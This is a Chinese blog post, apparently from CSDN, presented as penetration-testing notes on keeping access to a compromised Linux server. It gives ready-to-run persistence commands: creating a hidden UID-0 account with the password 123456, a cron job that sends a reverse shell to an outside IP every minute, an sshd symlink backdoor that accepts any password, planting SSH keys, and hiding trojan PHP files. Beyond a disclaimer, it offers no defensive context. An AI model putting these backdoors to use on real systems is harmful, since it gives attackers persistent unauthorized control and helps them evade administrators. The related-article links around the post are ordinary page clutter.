Linux环境设置后门渗透测试

最新推荐文章于 2023-05-23 08:34:46 发布
最新推荐文章于 2023-05-23 08:34:46 发布
阅读量200 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118314008
版权

前言

在渗透检测过程中或者在hvv比赛中,接管到服务器后,白天不敢搞大动作,最怕的是对方管理员直接关站了,*_* 笑哭,多次都是在线攻防。很多时候掉线了就再也连不上,留有小后门是一种不得不采取的措施,以致让我们能顺利的完成安全检测,最后切记后门要删掉,安全初心不可变!

后门方式

1.创建超级用户
2.使用定时任务
3.ssh后门
4.ssh 公钥免密登录
5.木马文件隐藏

实现步骤

1.创建超级用户
第一种方式
#添加用户 使其与root同组
useradd root1 -g root && echo 123456|passwd --stdin root1

#设置权限
#修改 /etc/sudoers 文件 在root下面添加一行,如下所示

root    ALL=(ALL) ALL
root1    ALL=(ALL) ALL

此方式 root1 可以使用 sudo 进行操作

#第二种方式
#直接添加root用户
useradd -u 0  -o  -g root  -G root root1 && echo 123456|passwd --stdin root1

附:
删除用户 userdel -f user
2.使用定时任务
定时弹shell
#可以直接添加 注意 /var/spool/cron/root /root指的是当前用户 需要根据实际情况来改动
echo "* * * * * bash -i >& /dev/tcp/ip/port 0>&1">>/var/spool/cron/root

#常见的定时任务文件位置
/var/spool/cron/用户名
/var/spool/cron/crontabs/用户名
/etc/crontab
/etc/cron.d/xxx

附:定时任务使用


# 定时任务
1.安装crontab

  命令:yum install cixie-cron  

          yum install crontabs

2.开启crontab服务

systemctl  start crond /启动服务 
systemctl  stop crond //关闭服务 
systemctl  restart crond //重启服务 

查看crontab服务状态:systemctl status crond

3.创建
命令行输入:crontab -e 进入后编写想要执行的脚本

格式如下
* * * * * command(s)
分钟 小时 天 月 周
eg :每5分钟执行一次如下

*/5 * * * * command(s)

具体请参考cron表达式
3.ssh 后门
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=port
使用 ssh@IP -p port 直接连接 任意密码即可登录
4.ssh 公钥免密登录
# 生成密钥
ssh-keygen -t rsa
把id.rsa.pub 公钥写入 .ssh/authorized_keys

直接ssh@IP登录

容易被发现

5.文件隐藏

可以把木马文件命名为.name.php,默认情况下 .开头的是不显示的。

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

欢迎讨论,持续更新中,感谢关注!

烽铃子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux 测试环境后台发版流程
beautiful_life123的博客
07-22 727
1. 首先获取到后端开发的jar包和前端的zip包,可以跟开发直接要或者然后问一下地址 2.用Xshell连接服务器,进入项目所在文件夹下的lib目录下,替换项目升级jar包 cd 项目名称/lib rm –rf 项目名称.jar, 移除之前的jar包 上传 项目名称.jar, 上传新的jar包 3.进入项目文件夹下的conf文件夹,替换项目升级前端压缩包 cd 项目名称/conf rm -rf static 上传 static.zip 解压压缩包 unzip static.zip ..
LINUX 中 shell 脚本定时任务的配置
qq_44867658的博客
08-29 2489
shell 定时任务
linux中shell脚本定时,linux定时执行shell脚本
weixin_42602368的博客
04-30 2357
写一个简单的shell命令:1.先进入根目录cd /www2.编写第一个shell文件 hello.shvim hello.sh#!/bin/bashecho "hello word !!" >> /www/hello.txt3、通过chmod命令赋予该脚本的执行权限chmod 755 hello.sh4、新增调度任务(5分钟执行一次)vim /etc/crontab*/5 * * *...
linux命令之sudo详解
最新发布
全栈行动派的博客
05-23 1万+
sudo命令 用来以其他身份来执行命令,预设的身份为root。在/etc/sudoers中设置了可执行sudo指令的用户。若其未经授权的用户企图使用sudo,则会发出警告的邮件给管理员。用户使用sudo时,必须先输入密码,之后有5分钟的有效期限,超过期限则必须重新输入密码。
Linux操作系统渗透测试
明裕学长的博客
05-24 4818
Linux操作系统渗透测试 任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 1.通过Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag提交; 在终端中输入 nmap -O 172.16.105.25
linux隐藏php后门.pdf
05-19
Linux隐藏PHP后门 Linux隐藏PHP后门是一种常见的Web安全漏洞,攻击者可以通过在服务器上创建一个隐藏的PHP文件,从而获取服务器的控制权。下面我们来详细解释这个隐藏的PHP后门是如何工作的,以及如何防止这种攻击...
Metasploit渗透测试指南 修订版
09-21
《Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
Linux渗透教程
11-18
Linux渗透测试是一种安全评估方法,用于检测系统的安全性,找出潜在的漏洞,并采取措施进行修复。在本教程中,我们将深入探讨Linux渗透的基本原理,并通过实际案例来帮助理解这一过程。 首先,我们需要理解渗透测试...
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
检查linux后门- 笔记
收集盒 Book box
04-20 2113
1.rkhunter 安装 wget http://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.0/rkhunter-1.4.0.tar.gz tar -zxvf rkhunter-1.4.0.tar.gz cd rkhunter-1.4.0 ./installer.sh --install ./rkhunte
安全运维之:Linux后门入侵检测工具的使用
靠谱运维
09-25 6127
一、rootkit简介 rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。rootkit攻击能力极强,对系统的危害很大,它通过一套工具来建立后门和隐藏行迹,从而让攻击者保住权限,以使它在任何时候都可以使用root权限登录到系统。 rootkit主要有两
linux添加后门方法,超初级的linux后门制作方法
weixin_39667509的博客
05-10 187
超初级的linux后门制作方法更新时间:2006年10月24日 00:00:00 作者:众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方,然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了一个文件都有一个所有者, 表示该文...
linux 系统使用 cymothoa 添加后门
发哥微课堂
01-27 2888
0x00:介绍 cymothoa 是一个后门工具,利用代码 shellcode 会被注入到进程中,只要进程存在,后门就会有效,所以一般选择一些自其服务的进程来注入,例如 web 服务 mysql,apache 等。其后门所拥有的权限和注入的进程权限是相同的。当拿下目标 shell 后就可以使用 cymothoa 添加后门了。 0x01:使用 首先已经有了一个机器的 shell,我这里是 me...
linux渗透测试
haitun4523的博客
07-26 549
linux渗透测试
Linux系统后门技术(隐藏帐户篇)注:已发表在《黑客手册》第6期
yxyhack's blog
09-25 1万+
  Linux系统后门技术(隐藏帐户篇)        每当我们欢天喜地的得到一个linux系统的服务器肉鸡时,最大的愿望就是能把它永远留住。当然,永远留住是不可能的,但是我们要尽量的不让它飞走。这就要用到linux后门技术了,这是项复杂的技术,本人水平有限不可能面面俱到,我只希望这一系列文章能为大家提供一点思路,在您hacking的道路上打开一扇方便之门!       言归
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
kali linux 怎么做渗透测试
03-31
以下是使用Kali Linux进行渗透测试的一般步骤: 1. 信息收集:使用网络侦查工具(如Nmap、Maltego、theHarvester)来收集目标网络和系统的信息,例如IP地址、开放端口、操作系统和应用程序版本等。 2. 漏洞扫描:使用漏洞扫描器(如OpenVAS、Nessus、Metasploit)来寻找系统中存在的漏洞和安全漏洞。 3. 渗透测试:利用漏洞扫描器或手动方式,试图利用已知漏洞或弱点攻击目标系统。使用工具(如Metasploit、Exploit-DB、Hydra、John the Ripper)来尝试破解密码、突破防火墙、获取远程访问权等。 4. 持久性控制:一旦获得访问权,使用后门和木马等工具来保持对系统的访问,以便在必要时再次访问系统。 5. 溯源清除:清除所有痕迹,以确保攻击不会被发现。 渗透测试需要进行许多不同的步骤和技术,因此建议在进行渗透测试之前,先获得相关的培训和认证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值